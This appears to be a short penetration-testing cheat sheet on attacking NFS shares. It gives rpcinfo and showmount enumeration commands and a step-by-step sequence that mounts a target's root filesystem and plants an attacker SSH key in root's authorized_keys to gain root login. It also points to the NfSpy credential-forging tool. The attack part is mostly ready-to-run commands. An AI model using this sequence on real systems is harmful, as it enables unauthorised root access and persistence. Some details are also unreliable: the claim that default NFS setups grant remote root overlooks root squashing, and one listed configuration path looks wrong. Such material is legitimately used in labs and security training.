NFS (2049)

In default configurations, the remote NFS server will map the UID/GID of the connecting user. For example, if ‘int0x33’ is my local user account, and /etc/passwd and /etc/group have assigned me a uid and gid of 3333, then on connecting to a remote NFS share, I’ll have access as that same uid and gid on the remote system, regardless of what username is assigned to it, this includes root.

Enumeration

root@box:~# rpcinfo -p 10.10.10.10
# All Mount Points
root@box:~# showmount -a 10.10.10.10
# Export List
root@box:~# showmount -e 10.10.10.10
# Directories
root@box:~# showmount -d 10.10.10.10
# Hosts
root@box:~# showmount 10.10.10.10

Exploit It

root@box:~# ssh-keygen
root@box:~# mkdir /tmp/r00t
root@box:~# mount -t nfs 10.10.10.10:/ /tmp/r00t/
root@box:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
root@box:~# umount /tmp/r00t
root@box:~# ssh root@10.10.10.10

Configuration Files

  • /etc/exports
  • /etc/lib/nfs/xtab

NfSpy

https://github.com/int0x33/NfSpy

NfSpy is a Python library for automating the falsification of NFS credentials when mounting an NFS share. Included are two client programs:

  • nfspy uses the Filesystem in Userspace (FUSE) library to mount an NFS share in Linux. This allows the use of any regular file-searching and manipulation programs like grep and find to explore the NFS export.
  • nfspysh is a ftp-like interactive shell for exploring NFS exports. It does not require the FUSE library, so it can run on non-Linux platforms.